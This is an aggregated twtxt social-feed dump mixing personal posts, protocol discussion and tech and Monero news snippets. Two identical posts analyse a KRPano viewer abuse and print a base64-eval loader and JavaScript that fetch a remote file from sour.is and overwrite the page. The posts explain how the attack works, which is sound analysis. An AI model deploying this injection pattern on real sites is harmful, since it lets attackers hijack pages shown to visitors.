Even though I really do like the shell, I always use Dolphin to mount my digicam SD card and copy the photos onto my computer. I finally added a context menu item in Dolphin to create a forest stroll directory with the current date in order to save some typing:
The following goes in ~/.local/share/kservices5/ServiceMenus/galmkdir.desktop:
[Desktop Entry]
Type=Service
X-KDE-ServiceTypes=KonqPopupMenu/Plugin,inode/directory
Actions=Waldspaziergang;
[Desktop Action Waldspaziergang]
Name=Heutigen Waldspaziergang anlegen…
Icon=folder-green
Exec=~/src/gelbariab/galmkdir "%f"
In order to update the KDE desktop cache and make this action menu item available in Dolphin, I ran:
kbuildsycoca5
The referenced galmkdir script looks like that:
#!/bin/sh
set -e
current_dir="$1"
if [ -z "$current_dir" ]; then
echo "Usage: $0 DIRECTORY" >&2
exit 1
fi
dir="$(kdialog \
--geometry 350x50 \
--title "Heutigen Waldspaziergang anlegen" \
--inputbox "Neues Verzeichnis in „$current_dir“ anlegen:" \
"waldspaziergang-$(date +%Y-%m-%d)")"
mkdir "$current_dir/$dir"
dolphin "$current_dir/$dir"
This solution is far from perfect, though. Ideally, I’d love to have it in the “Create New” menu instead of the “Actions” menu. But that doesn’t really work. I cannot define a default directory name, not to mention even a dynamic one with the current date. (I would have to update the .desktop file every day or so.) I also failed to create an empty directory. I somehow managed to create a directory with some other templates in it for some reason I do not really understand.
Let’s see how that works out in the next days. If I like it, I might define a few more default directory names.
I Did A Political Ad (but it’s not what you think) ⌘ Read more
@eapl.me@eapl.me You asked me for private keys for testing purposes. I have added it to the bottom of this page: https://dm-echo.andros.dev/
It will soon be running. It won’t be long now.
Honest Government Ad | Anthony Salmonese’s Surprise! ⌘ Read more
10 Great Movies That Were Made into Bad Musicals
Some movies are iconic and beloved for their compelling stories, unforgettable characters, and immersive worlds. However, not every film can make a successful transition to the stage. Cinema and theatre are very different, and while a plot may seem amazing on screen, it often doesn’t translate well when songs are added. Here are 10 great […]
The post [10 Great Movies That Were Made into Bad Musicals](https://listverse.com/2025/04/10/1 … ⌘ Read more
guys omg the people behind pico.sh are so nice ;_; one of the people running it emailed me to let me know i had what was likely a malfunctioning (or well, not working as intended) script that was spawning the same SSH tunnel over and over and they wanted to give me a heads up.
and i felt SO BAD because i worried i was straining their service or something so i disabled my 4 tunnels (they were serving little SSH games and services) and got back to them.
but i just woke up to THE NICEST EMAIL EVER reassuring me that i was actually using it as intended, it was just my script that was having problems, and they even said that if it was intended to work that way it was fine and they just wanted to let me know!
so i restarted the tunnels but have since added lockfiles as safeguards so that when the script is run it’ll check if it’s already running :D
Adding to this, we already tried. It didn’t go too well. Slightly related—because it is a third party “integration”—I might be a “smaller group” member, but I don’t care much about one-way feeds (mostly RSS from blogs, news articles, etc.) either.
@lyse@lyse.isobeef.org I’m open to other suggestions 🤣 But hopefully both adding the additional prompt, not allowing it to enter shell history and removing from my shell history prevents me from doing such silly things in haste by pressing ^R and using fuzzy search which if you type fast you sometimes get wrong 😑
[$] Supporting untorn buffered writes
At last year’s
Linux Storage, Filesystem,
Memory-Management, and BPF Summit (LSFMM+BPF), there was a discussion about atomic writes that was
accompanied by patches to support the feature in the block layer, and for
direct I/O on XFS. That
work was merged, but another piece of that discussion concerned adding the
feature for buffered I/O, in part because the PostgreSQL database currently
has to jump through hoops to ensure that its writes are not “torn”
(partial … ⌘ Read more
[$] Better hugetlb page-table walking
The kernel must often step through the page tables of one or more processes
to carry out various operations. This “page-table walking” tends to be
performed by ad-hoc (duplicated) code all over the kernel. Oscar Salvador
used a memory-management-track session at the 2025 Linux Storage,
Filesystem, Memory-Management, and BPF Summit to talk about strategies to
unify the kernel’s page-table walking code just a little bit by making
hugetlb pages look more like ordinary pages. ⌘ Read more
it adds users by finding them in feeds mentioning or following. Your URL is already added.
Hmm i am not sure how you got the URL with users at the end..
it adds users by finding them in feeds mentioning or following. Your URL is already added.
Hmm i am not sure how you got the URL with users at the end..
@lyse@lyse.isobeef.org you must be loved by all the web developers in town! But ok, I have added all the missing semicolons, that should technically be there, but them not being there, does not make a difference.
Font color change inside every summary element, was a very deliberate choice, to color the text, but leave the arrow black (same as website background). But ok, I rewrote the CSS to hide the arrows and make all summaries white - since this also works better, with some dark theme enforcing browser extensions.
HOWEVER “p” as a child element of “summary” is a thing, that as far as I know, all browsers respect and if a font color is applied only once, I don’t think it matters, if it’s done through HTML or CSS, you smart ass.
Honest Government Ad | Canada Election 2025 ⌘ Read more
10 Worst Movies by Great Directors
While the days of movies serving as a cultural monolith are long gone, there are still names out there that demand as much as hundreds of millions of dollars in investment from companies and demand from audience members many hours in driving to theaters, watching ads, reading or writing essays devoted to their work. Whether […]
The post 10 Worst Movies by Great Directors appeared first on [L … ⌘ Read more
The Bizarre Origin Stories of Ten World-Famous Brand Names
Large corporations have perfected marketing and branding in the decades since the era portrayed on the famed TV show Mad Men. Back then, ad agencies and marketing experts were just trying to figure out how to advertise to the average consumer. Nowadays, there are all kinds of focus groups, algorithms, and tactics—both shrewd and shady—that’ll […]
The post [The Bizarre Origin Stories of Ten World-Famous Brand Names] … ⌘ Read more
thanks andros!
instead of adding the new twt at the end of the feed, do it at the beginning
The PHP client did that originally, although I didn’t see a real benefit if you use… a client.
It could help if you read the .txt file through a browser or something. Also, not many clients are prepared to cut the request, and you can’t rely on the file being organized that way, so finally we dropped that feature.
@bender@twtxt.net I taught the whole ecosystem 😁
@prologic@twtxt.net @eapl.me@eapl.me The question I was asked the most was: How do I discover people?
Someone came up with a fantastic idea, instead of adding the new twt at the end of the feed, do it at the beginning. So you can paginate by cutting the request every few lines.
Thinking about adding a little “focus” feature to my window manager: It hides all but one window, no wallpaper, no bars.
It would turn this
https://movq.de/v/a75eb68770/a0.jpg
into this
https://movq.de/v/a75eb68770/a1.jpg
or this
https://movq.de/v/a75eb68770/b0.jpg
into this:
https://movq.de/v/a75eb68770/b1.jpg
🤔
yeah, that’s the tricky part of adding features
@eapl.me@eapl.me I think the benefits do not outweigh the disadvantages. Clients would have to read and merge the information from 2 txt and a new metadata would have to be added with the address of this file.
Also, it is very easy to filter or ignore it.
It’s extremely surprising to me that younger non-technical people just type in their full name (properly cased first and last name with a space in between) for a technical username in account registration or login forms. I’ve seen that happening several times in the past few years. The field name is “Benutzername” in German, literally “username”. Even adding a placeholder text to signal that they could simply use their nickname in lowercase did not change anything at all. Well, one person used at least an e-mail address.
This wasn’t the case six, seven years ago, everybody had some “real” username. Even non-techies. It looks like some “common knowledge” is getting lost. Strange. Very weird. It trips me every time I see it.
Have you experienced something similar?
@prologic@twtxt.net Yeah and I don’t get why … There’s no copyrighted music in it, no ads (at least I don’t see any) … Just weird. 🥴
Perfect!
I now also implemented basic replying by hitting a as in answering. What’s missing is automatically adding mentions in the message text template. That’s gonna be a bit more tricky, though.
tt.) Now, this is the second attempt in tt2.
Righto, now with added basic subject support. Hopefully!
[$] MM medley: huge page allocation, page promotion, KSM, and BPF
As the 2025 Linux\
Storage, Filesystem, Memory-Management, and BPF Summit (LSFMM+BPF)
approaches, the density of memory-management patches on the mailing lists
has increased. Included among those are patches aimed at improving the
reliability and performance of huge-page allocation, implementing page
promotion on tiered-memory systems, adding a different approach to
deduplicating memory, and replacing the BPF memory alloc … ⌘ Read more
@eapl.me@eapl.me Good job! I have added these comments:
- It is only long for humans. Clients can only leave a hyperlink.
- The nickname is just a decoration, only the date that acts as the id and the URL matter. The nick is used for humans reading the feed.
- It can be migrated with a script, if the feed exists.
ditatompel releases ‘xmr-remote-nodes’ v0.2.1
ditatompel1 has released xmr-remote-nodes 2 version 0.2.13 with a fix for CVE-2024-453384, new features and updates:
”`
- fix: CVE-2024-45338 in #173
- feat: Added tor hidden service via HTTP header
- feat: Added more information on monero node details page
- feat: Added curl example command to Node details modal and page
- feat: Store hashed user IP address when submitting new node
- build(de … ⌘ Read more”`
Honest Government Ad | Minority Government ⌘ Read more
U.S. Added to Global Human Rights Watchlist Over Declining Civil Liberties
Solcyré Burga, Staff Reporter - Time Magazine
_Stephan: Psychopath Trump – I say psychopath, by the way, because no functioning rational person would behave as Trump is behaving – aided by the MAGAt flying monkeys – an image from the Wizard of Oz – in Congress are not only destroying our democrsacy and economy, they are also completely trashing the stature of the United … ⌘ Read more
Apple Pulls iPhone 16 Ad Showing Off ‘More Personal Siri’
Apple has pulled an ad for the iPhone 16 that depicted a “ more personal Siri,” following the company’s admission last week that it is delaying some of the Apple Intelligence Siri features that it originally expected to release in iOS 18.
English actor Isabella Ramsey starred in the now-private YouTube video, [o … ⌘ Read more
lang=en @xuu@txt.sour.is gotcha!
From that PR #17 I think it was reverted? We could discuss about metadata later this month, as it seems that I’m the only person using it.
I’ve added a [lang=en] to this twt to see current yarn behaviour.
tvOS 18.4 Beta Further Hints at Apple’s Work on Smart Home Hub
In the latest beta of tvOS 18.4, there are new hints of Apple’s work on a smart home hub accessory that’s rumored to be coming as soon as this year. MacRumors found that Apple has added ChatKit framework to the tvOS code, which is curious as there is no Messages app available on the Apple TV or the HomePod.
And I just added a video clip of the woodpecker. As you can easily see from the shaking, it hammers so dang hard that the whole ground around the tree vibrates.
I hate to say it .. but we as a species have peaked at this moment. It’s all down hill from here.
I hate to say it .. but we as a species have peaked at this moment. It’s all down hill from here.
SChernykh releases P2Pool v4.4
SChernykh1 has released P2Pool 2 version 4.43 with various new features and fixes.
New Features:
* Added RPC-SSL support for Monero node connections
* Removed deprecated --config command line parameter
* Faster initial sync (0.5-1 seconds saved on verification of blocks)
Bugfixes:
* Updated internal dependencies
The full list of changes since v4.3 is available on Github4.
Before using the software, you should v … ⌘ Read more
I have released new updates to the twtxt.el client.
- Markdown to Org mode (you need to install Pandoc).
- Centred column.
- Added new logo.
- Added text helper.
The new version I will try to finish the visual thread. You still can’t see the thread yet.
#emacs #twtxt #twtxtel
Adding Custom Sleep Screen Images to the Kindle Scribe ⌘ Read more
I added to my bookmark. Good job @arne@uplegger.eu 🙌
** Skwaking Week Notes **
I’d never thought about adding playlists to my website, but then I did it and now I wanna add more. While I wait to put together another playlist, here’s the song that I’m listening to right now — Lady Lamb’s“Crane Your Neck.”
We had a few big snows, so the kids spent extra time at home and we’ve done a fair bit of sledding and shoveling. There was a bunch of frozen rain after one of the snow storms, so the snow had a crunch … ⌘ Read more
Honest Government Ad | Our Last Fair Election? ⌘ Read more
iOS 18.4 Adds New Ambient Music Feature
In iOS 18.4, there’s a new Ambient Music option that can be added to Control Center. There are four different sound categories, including Sleep, Chill, Productivity, and Wellbeing.
Each category can be added to Control Center separately, and tapping one plays a random selection of sounds or music from that particular category.
You can’t choose what’s playing from Control Center, but if … ⌘ Read more
Apple News+ Gains Recipes, Restaurant Reviews, and More in iOS 18.4
With iOS 18.4 and iPadOS 18.4, Apple plans to introduce new features for the Apple News + subscription service. Apple is adding Apple News+ Food, a section that features tens of thousands of recipes, stories about restaurants, tips for healthy eating, kitchen essentials, and more.

SummaryNote: it is possible that some relevant information may be missing from this summary; read the full log file for the complete, unedited discussion.
- *Participants … ⌘ Read more
@prologic@twtxt.net Holly, didn’t know bots and crawlers could do comedy now… they should’ve added “Dave Chappelle/69.420” to their UA.
Spotify Readies Premium Tier With Hi-Fi Audio and AI Features
Spotify users waiting to learn when the service’s long-delayed high-quality premium audio service will materialize may finally have something to chew on. Bloomberg reports that the streaming service hopes to roll out a new “Music Pro” tier later this year.
RED (Tuesday … ⌘ Read more
Pineboards Introduces Modulo Carrier Boards for Raspberry Pi CM5 and CM4
Pineboards has introduced the Modulo4, Modulo5 Basic, and Modulo5 IO PoE+ carrier boards, adapting Raspberry Pi Compute Modules to the Raspberry Pi 5 form factor. These boards maintain compatibility with PCIe HATs, cases, and cooling solutions, with the Modulo5 IO PoE+ adding PoE+ support for network-powered operation. Pineboards indicates that with the release of the […] ⌘ Read more
How to Watch Super Bowl LIX Free on iPhone, iPad, Mac, and Apple TV
Super Bowl LIX takes place this Sunday, February 9. In the U.S., the game will be streaming for free in upscaled 4K on FOX’s ad-supported streaming service Tubi, which is available on the iPhone, iPad, Mac, Apple TV, Apple Vision Pro, and many other devices.
This year, the Kansas City Chi … ⌘ Read more
Using AirTags for Dogs: Track Your Pet for Added Peace of Mind
Using AirTags to keep track of a dog can offer some additional peace of mind, especially if you’re worried about your fuzzy companion wandering off. Whether your dog has a penchant to escape out of your yard, has a tendency to bolt, or simply likes to run off at any opportunity, AirTags can provide a … Read More ⌘ Read more
I love finding content on Gopher because it’s devoid of paid favoritism, be it in ads or search results.
Honest Government Ad | Nuclear (Australia) ⌘ Read more
AI-powered image descriptions on my blog
My blog still has a long way to go when it comes to accessibility, but I’m excited about two new plugins I’ve just added to make things better. ⌘ Read more
Netflix Increases Prices Again
Netflix is raising its prices for all plans in several countries, including the United States, Canada, Portugal, and Argentina. The cheapest Standard with ads plan will be $1 more expensive in the U.S., going from $6.99 to $7.99 per month.
The Standard plan’s price will increase from $15.49 to $17.99 per month, and the Premium plan will now cost $24.99 per month, up from $22.99 per month. The St … ⌘ Read more
I want to share a little idea for a new extension with the goal of adding direct messages in #twtxt https://github.com/tanrax/twtxt-direct-message-extension
Instagram Adds New Features to Reels as TikTok Ban Looms
With TikTok on track to be banned from U.S. app stores starting on Sunday, Instagram is adding new features to Reels, its video-based feature that’s modeled after TikTok.
Going forward, there will be a new Reels feed that includes videos that your friends have liked or commented on, so you can see what your friends have watched and what they like. Your friends … ⌘ Read more
@<url> form of mentions. Strictly require that all mentions include a nickname/name; i.e: @<name url>.
Sounds about as complex as adding @nick@domain support by doing a webfinger lookup to get the URL.
@<url> form of mentions. Strictly require that all mentions include a nickname/name; i.e: @<name url>.
Sounds about as complex as adding @nick@domain support by doing a webfinger lookup to get the URL.
@lyse@lyse.isobeef.org Yeah, what else does one need? 😅
I added more instructions, made it portable (so it runs on my own OS as well as Linux/DOS/whatever), and the assembler is now good enough to be used in the build process to compile the bootloader:
That is pretty cool. 😎
It’s still a “naive” assembler. There are zero optimizations and it can’t do macros (so I had to resort to using cpp). Since nothing is optimized, it uses longer opcodes than NASM and that makes the bootloader 11 bytes too large. 🥴 I avoided that for now by removing some cosmetic output from the bootloader.
Isto é que é um currículo diverso, amigues
Apple Resumes Offering Interest-Free Financing on iPhones in Canada
Apple’s financing partner Affirm this month started offering interest-free financing on iPhone purchases in Canada again, after stopping doing so in mid-2023. With a 0% loan from Affirm, you can pay for an iPhone over 24 months with zero interest added.
;eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
I need an alternative news source… Something I can shove into feeds.twtxt.net that helps me keep up-to-date with Tech and other important news 🗞️ Hmmm 🤔 Suggestions? I can’t stand Slashdot anymore since they’ve decided to come down hard on ad-blockers 🤦♂️
Apple Pay Now Lets You Pay Later With Synchrony
Synchrony is now available as a buy-now, pay-later option when checking out with Apple Pay online and in apps on iPhone and iPad.
Synchrony was added to a list of Apple Pay installment providers in the U.S. in an Apple support document that was updated today, joining [Affirm](https://www.macrumors.com/2024/09/16/apple-pay-affirm … ⌘ Read more
Apple Stepping Up Plans to Expand News App to More Countries
Apple plans to scale up its News app by adding new countries to the platform beyond the US, Canada, the UK, and Australia, according to the Financial Times.
The plans reportedly include building its locally focused news coverage in the UK, as well as bringing its puzzles section to the coun … ⌘ Read more
Boog900 completes Cuprate dev work CCS
Boog9001 has posted a third and final progress report2 for their latest full-time Cuprate 3 development work CCS proposal4:
People have been syncing using the initial binary with mostly success a couple of people have reported issues, which will be investigated [..] Fast sync is yet to be added. I have ideas for optimisations [..] that should significantly speed up sync on top of where we already are (faster than mo … ⌘ Read more
i like this little ideas utility i’ve been using like i keep pulling up the idea table to see what i’ve added and it makes me wanna start one of them like the CLI app i wanna write in golang with charmbracelet’s bubbletea even though i only have a vague idea of what i want in a CLI app
@kat@yarn.girlonthemoon.xyz just spent like an hour playing with this and adding newjeans ASCII art this is the cutest shit ever
@kat@yarn.girlonthemoon.xyz i was adding catppuccin themes everywhere possible last night right but now my desktop wallpaper & conky widget, which are just black & white, don’t really match, so i need something dark purple tinged! i’ll make a quick edit later
P2Pool v4.3 released with initial sync improvements
SChernykh1 has released P2Pool 2 version 4.33 with initial sync improvements, various new features and bugfixes.
”`
New Features:
- Added –data-dir command line option
- Added –no-stratum-http command line option to disable HTTP on Stratum ports
- Faster initial sync (0.5-1 seconds saved on verification of blocks)
Bugfixes:
- TLS: fixed not being able to use Letsencrypt certificate … ⌘ Read more”`
** Hello my beautiful ghouls **
This is a test. I’m experimenting with adding rss only posts to my website.
This post should only show up in rss feed readers, and, hopefully, leave no other trace on any directory pages on my website.
Each rss-only post will also have a html rendered page, but there won’t be any way to navigate to that page without knowing the actual url for that page. ⌘ Read more
Five Apple Intelligence Features Coming in 2025
Even though iOS 18.1 and iOS 18.2 added multiple Apple Intelligence features like Image Playground, Genmoji, Writing Tools, and more, there are still new Apple Intelligence capabilities that we’re waiting on. Apple has at least one more major Apple Intelligence update coming in 2025, and the … ⌘ Read more
Introducing Annotated Logger: A Python package to aid in adding metadata to logs
We’re open sourcing Annotated Logger, a Python package that helps make logs searchable with consistent metadata.
The post [Introducing Annotated Logger: A Python package to aid in adding metadata to logs](https://github.blog/developer-skills/programming-languages-and-frameworks/introducing-annotated-logger-a-python-package-to-aid-in-a … ⌘ Read more
@prologic@twtxt.net Well I just mirrored yarnd’s JSON in my webfinger endpoint and lookup, so not much else to do for standardization.
And for people who don’t like PHP you can always just go with Added WebFinger support to my email address using one rewrite rule and one static file. or simply putting a static JSON in place for .well-know/webfinger
[ANN] PiNodeXMR v6.24.12 update available - (Ban Lists)
Hi all, here at PiNodeXMR we’ve been following along with the MRL ban list discussion and have re-added the function to pull-in a ban list of IPs. In the name of decentralisation/anti-censorship, the ban lists are optional for PiNodeXMR users. You can find the new options in your terminal setup menu under “Extra Network tools”.
Links:
@eapl.me@eapl.me why not https://domain.com/.well-known/twtxt/:domain/:user ?
the business card test is this can you write it on your business card and have someone you give it to be able to figure it out without added context?
- phone number: yes because everyone knows what a phone number is.
- email address: yes, everyone knows an email and their aol or prodigy will let them email.
- twitter/x/insta/pintrest handle: no, whats a twitter? do i need to sign up?
- domain name: yes its simple and you just type it in a browser right?
- twtxt url: kinda? its a bit long and is that a forward slash? or a backward slash?
@eapl.me@eapl.me why not https://domain.com/.well-known/twtxt/:domain/:user ?
the business card test is this can you write it on your business card and have someone you give it to be able to figure it out without added context?
- phone number: yes because everyone knows what a phone number is.
- email address: yes, everyone knows an email and their aol or prodigy will let them email.
- twitter/x/insta/pintrest handle: no, whats a twitter? do i need to sign up?
- domain name: yes its simple and you just type it in a browser right?
- twtxt url: kinda? its a bit long and is that a forward slash? or a backward slash?
According to internet it’s adshield and i dont think you should allow this domain: https://redlib.nadeko.net/r/uBlockOrigin/comments/188khmu/site_breaks_with_error_unless_ad_domain_is/
Living together: Reflections on collective living
[A version of this post was initially published on 2022-05-30 (Setting
Orange, the 4 day of Confusion in the YOLD 3188) in my gemlog at:
gemini://gem.hack.org/log/collectives.gmi
It’s been slightly edited and a few photos added.
Posted on the blog on 2024-12-15 02:33 +0100. Later updated with how
Area 41 ended.]
I dreamt about Dial House last night. I’ve never been there, but it
was like I belonged, like I was meant to be th … ⌘ Read more
Living together: Reflections on collective living
[A version of this post was initially published on 2022-05-30 (Setting
Orange, the 4 day of Confusion in the YOLD 3188) in my gemlog at:
gemini://gem.hack.org/log/collectives.gmi
It’s been slightly edited and a few photos added.]
I dreamt about Dial House last night. I’ve never been there, but it
was like I belonged, like I was meant to be there.
Last I heard anything about Dial House they were trying to gather
enough money … ⌘ Read more
Microsoft Teams for iPad Now Includes External Camera Support
Microsoft has announced that Teams for iPad now supports external cameras, allowing users with older devices to hook up better-quality webcams during Teams calls.
With iPadOS 17, Apple added suppor … ⌘ Read more
Cleaned up my npm package for twthash; made it CommonJS compatible, added more documentation and even a test. Current version is 1.2.2
Added TwtHash hashes to every message on my personal Twtxt HTML renderer. Code is not yet ready for prime-time. Need to work out some kinks still.
rehrar releases Stack Wallet v2.1.9, Stack Duo v1.2.4
rehrar1 has released Stack Wallet2 version 2.1.93 and Stack Duo version 1.2.44 with various fixes and improvements.
Stack Wallet:
* Show Monero/Wownero tx private key option
* Fix Frost error
* Stack Wallet Backup fixes
Stack Duo:
* Added Monero churn options
* Paynym temporarily disabled while kinks worked out [..]
The release notes, binaries, and the SHA256 hashes can … ⌘ Read more
watchOS 11.2 Lets You Pause iPhone Video With Camera Remote App
In watchOS 11.2, Apple has added a useful new feature that’s designed to allow you to pause video that you’re recording on the iPhone using the Camera Remote app on the Apple Watch.
The Camera Remote app has been available since the Apple Watch initially launched, and while there was an option to start … ⌘ Read more
Watch the Touching Apple Holiday Ad for 2024: Heartstrings
Apple has introduced their annual Holiday advertisement for the 2024 season, titled “Heartstrings”, and it’s an unusually moving commercial that focuses on hearing loss and the hearing aids feature of AirPods Pro 2 (which happen to be hugely discounted on Amazon right now, if you’re in the market). In the touching and family oriented commercial, … [Read More](https://osxdaily.com/2024/11/29/watch-the-touching-apple-ho … ⌘ Read more
Here is Apple’s Annual Holiday Season Ad
Apple today shared its annual holiday season ad. The video is titled “Heartstrings” and highlights the new hearing aid feature on AirPods Pro 2.
“For so many of us, sound and how we hear shape how we connect to the world around us,” said Apple, in the video description. “Yet, people with hearing loss wait an average of 10 years before getting their hearing tested and fitted for heari … ⌘ Read more
Stack Wallet adds support for XMR view-only wallets, ‘churn options’
rehrar1 has released Stack Wallet2 version 2.1.83 with support for Monero view-only wallets and churn options 4, various other changes and bug fixes.
Added Monero churn options
Added ability to set tor/clearnet options for individual nodes
Bug fixes for Solana, Tezos, ETH, Cardano, and epic
Paynym temporarily disabled while kinks worked out
Adju ... ⌘ [Read more](https://monero.observer/stack-wallet-v2.1.8-support-monero-view-only-wallets-churn-options/)
[ANN] Monero Remote Node Monitoring project updates
Since my last post on Reddit in June 2024, there have been some major changes and new features.
* updated the license from GLWTS to a more widely recognized and permissive one (BSD-3-Clause)
* UI: switched from SvelteKit to Templ+HTMX to reduce external dependencies
* added support for monitoring both IPv6 and I2P nodes
* set up a Tor Hidden service for the web UI
Links:
- GitHub repository
- [Website](https://xmr.d … ⌘ Read more
Honest Government Ad | Congratulations President Trump ⌘ Read more